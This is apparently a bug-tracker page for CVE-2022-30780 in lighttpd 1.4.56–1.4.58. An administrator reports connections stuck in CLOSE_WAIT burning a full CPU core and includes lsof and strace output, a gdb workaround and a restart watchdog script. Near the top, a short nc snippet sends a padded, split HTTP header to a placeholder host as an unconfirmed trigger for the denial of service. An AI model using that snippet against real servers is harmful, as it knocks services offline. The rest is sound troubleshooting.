CVE-2022-30780: Bug #3059: Connections stuck in CLOSE_WAIT causing 100% CPU usage - lighttpd
Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers.
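Based on that description, the trigger is a request whose header section is large enough that the server needs more than one read() call to consume it. Purely as an illustration (the header name, padding size, and the delayed second write are my assumptions, not a confirmed proof of concept), something along these lines should exercise that path:

{
  printf 'GET / HTTP/1.1\r\nHost: target.example\r\n'
  # hypothetical oversized header, padded with 4000 bytes of filler
  printf 'X-Padding: %s' "$(head -c 4000 /dev/zero | tr '\0' 'a')"
  sleep 1   # delay so the header arrives across separate read() calls
  printf '\r\n\r\n'
} | nc target.example 80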
Hello folks,
I’ve run into an odd issue with some of the simple web servers we run (they just serve some text from index.html). Specifically, connections get stuck in CLOSE_WAIT and eat up 100% of the CPU.
For context, these are single-core VMs.
The issue started when we upgraded from lighttpd 1.4.55-2 to 1.4.57-1. I’ll give the full context of what was done, in case it helps. Right after the upgrade, the service failed to start, with these errors:
2021-01-13 20:21:21: (configfile.c.2269) server.upload-dirs doesn't exist: /var/cache/lighttpd/uploads
2021-01-13 20:21:21: (plugin.c.195) dlopen() failed for: /usr/lib/lighttpd/mod_openssl.so /usr/lib/lighttpd/mod_openssl.so: cannot open shared object file: No such file or directory
2021-01-13 20:21:21: (server.c.1238) loading plugins finally failed
and:
2021-01-13 20:21:21: (configfile.c.253) Warning: please add "mod_openssl" to server.modules list in lighttpd.conf. A future release of lighttpd 1.4.x will not automatically load mod_openssl and lighttpd will not use SSL/TLS where your lighttpd.conf contains ssl.* directives
So I installed the lighttpd-mod-openssl package and added mod_openssl to the server.modules list in /etc/lighttpd/lighttpd.conf (snippet below). That got the service starting again.
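For reference, the config change is one line (lighttpd’s += syntax appends to the existing server.modules list; the module itself comes from the lighttpd-mod-openssl package mentioned above):

# /etc/lighttpd/lighttpd.conf
# load the TLS module explicitly instead of relying on autoloading
server.modules += ( "mod_openssl" )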
After that, the servers ran normally for a while, until we got an alert about CPU usage. Looking into it, lighttpd was constantly consuming the entire core. Luckily, it still seemed to be accepting connections normally as far as we could tell from access.log, and error.log didn’t show anything out of the ordinary.
At this point, lsof on the process showed the following (with some entries redacted, of course):
mitd:~$ sudo lsof -p 157648
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
lighttpd 157648 www-data cwd DIR 254,1 4096 2 /
lighttpd 157648 www-data rtd DIR 254,1 4096 2 /
lighttpd 157648 www-data txt REG 254,1 375136 1966696 /usr/sbin/lighttpd
lighttpd 157648 www-data mem REG 254,1 23160 1967130 /usr/lib/x86_64-linux-gnu/libnss_cache.so.2.0
lighttpd 157648 www-data mem REG 254,1 51696 1968527 /usr/lib/x86_64-linux-gnu/libnss_files-2.31.so
lighttpd 157648 www-data mem REG 254,1 14408 1844237 /usr/lib/lighttpd/mod_staticfile.so
lighttpd 157648 www-data mem REG 254,1 30792 1841268 /usr/lib/lighttpd/mod_dirlisting.so
lighttpd 157648 www-data mem REG 254,1 3076960 1967430 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
lighttpd 157648 www-data mem REG 254,1 593696 1967535 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
lighttpd 157648 www-data mem REG 254,1 22600 1835392 /usr/lib/lighttpd/mod_accesslog.so
lighttpd 157648 www-data mem REG 254,1 55520 1839916 /usr/lib/lighttpd/mod_openssl.so
lighttpd 157648 www-data mem REG 254,1 14408 1843016 /usr/lib/lighttpd/mod_redirect.so
lighttpd 157648 www-data mem REG 254,1 14408 1835607 /usr/lib/lighttpd/mod_alias.so
lighttpd 157648 www-data mem REG 254,1 149608 1968567 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
lighttpd 157648 www-data mem REG 254,1 1839792 1967267 /usr/lib/x86_64-linux-gnu/libc-2.31.so
lighttpd 157648 www-data mem REG 254,1 43048 1966278 /usr/lib/x86_64-linux-gnu/libxxhash.so.0.8.0
lighttpd 157648 www-data mem REG 254,1 257528 1966472 /usr/lib/x86_64-linux-gnu/libnettle.so.8.0
lighttpd 157648 www-data mem REG 254,1 18688 1968044 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
lighttpd 157648 www-data mem REG 254,1 464848 1967316 /usr/lib/x86_64-linux-gnu/libpcre.so.3.13.3
lighttpd 157648 www-data mem REG 254,1 14408 1835248 /usr/lib/lighttpd/mod_access.so
lighttpd 157648 www-data mem REG 254,1 14408 1842895 /usr/lib/lighttpd/mod_indexfile.so
lighttpd 157648 www-data mem REG 254,1 177928 1966929 /usr/lib/x86_64-linux-gnu/ld-2.31.so
lighttpd 157648 www-data 0u CHR 1,3 0t0 7949 /dev/null
lighttpd 157648 www-data 1u CHR 1,3 0t0 7949 /dev/null
lighttpd 157648 www-data 2u unix 0xffff98ddb1b31800 0t0 1393254 type=STREAM
lighttpd 157648 www-data 3w REG 0,23 7 1393271 /run/lighttpd.pid
lighttpd 157648 www-data 4u IPv4 1393272 0t0 TCP *:http (LISTEN)
lighttpd 157648 www-data 5u IPv6 1393273 0t0 TCP *:http (LISTEN)
lighttpd 157648 www-data 6u IPv4 1393274 0t0 TCP *:https (LISTEN)
lighttpd 157648 www-data 7u IPv6 1393275 0t0 TCP *:https (LISTEN)
lighttpd 157648 www-data 8w REG 254,1 3423240 3670309 /var/log/lighttpd/error.log
lighttpd 157648 www-data 9w REG 254,1 117697465 3670308 /var/log/lighttpd/access.log
lighttpd 157648 www-data 10u a_inode 0,13 0 7868 [eventpoll]
lighttpd 157648 www-data 11u IPv4 1586902 0t0 TCP #####:https->#####.com:52059 (ESTABLISHED)
lighttpd 157648 www-data 12u IPv4 1435873 0t0 TCP ME.com:https->#####.com:41960 (CLOSE_WAIT)
lighttpd 157648 www-data 13u IPv4 1586953 0t0 TCP .com:https->:59153 (ESTABLISHED)
lighttpd 157648 www-data 19u IPv4 1415541 0t0 TCP ME.com:http->***********.com:43470 (CLOSE_WAIT)
lighttpd 157648 www-data 20r REG 254,1 27 3670597 /var/www/html/index.html
You can see fds 12u and 19u are both stuck in CLOSE_WAIT; they stayed in that state for hours. An strace of the lighttpd process showed messages similar to the following, repeated over and over:
epoll_ctl(10, EPOLL_CTL_MOD, 12, {EPOLLERR|EPOLLHUP, {u32=1349789952, u64=94078313441536}}) = 0
epoll_ctl(10, EPOLL_CTL_MOD, 12, {EPOLLIN|EPOLLERR|EPOLLHUP|EPOLLRDHUP, {u32=1349789952, u64=94078313441536}}) = 0
getsockopt(21, SOL_TCP, TCP_INFO, "\10\0\0\0\0\4x\0\200 \5\0@\234\0\0\264\5\0\0\264\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\231c\1\0\0\0\0\30\231c\1\234\257b\1\334\5\0\0\350\301\0\0007\275\1\0\233\336\0\0\377\377\377\177\n\0\0\0\264\5\0\0\3\0\0\0\0\0\0\0\20r\0\0\0\0\0\0", [104]) = 0
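For what it’s worth, the stuck sockets can also be listed directly by TCP state with ss from iproute2, which is quicker than picking through a full lsof dump:

# list TCP sockets in CLOSE_WAIT on the web ports, with the owning process
sudo ss -tnp state close-wait '( sport = :http or sport = :https )'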
At that point I used gdb as follows to close fds 12 and 19 specifically, after which CPU usage returned to normal and strace stopped showing the messages above:
gdb -p pid
call (int)close(12)
call (int)close(19)
exit
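The same fix can be applied non-interactively via gdb’s -batch and -ex flags, using the fd numbers taken from the lsof output above:

sudo gdb -p 157648 -batch \
  -ex 'call (int)close(12)' \
  -ex 'call (int)close(19)'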
To mitigate this in the short term, I have set up a cron job that checks CPU usage and restarts the service when it goes above a threshold; a sketch follows.
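The watchdog is roughly the following; the 90% threshold, script path, and systemd service name are just what we happen to use:

#!/bin/sh
# restart lighttpd when its CPU usage climbs past a threshold
# run from root's crontab, e.g.: */5 * * * * /usr/local/sbin/lighttpd-watchdog
THRESHOLD=90
# sum %CPU across all lighttpd processes, rounded to an integer
cpu=$(ps -C lighttpd -o %cpu= | awk '{s+=$1} END {printf "%d", s}')
if [ "${cpu:-0}" -gt "$THRESHOLD" ]; then
    logger -t lighttpd-watchdog "CPU at ${cpu}%, restarting lighttpd"
    systemctl restart lighttpd
fi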
Any help getting to the bottom of this bug would be appreciated; let me know what other info you may need.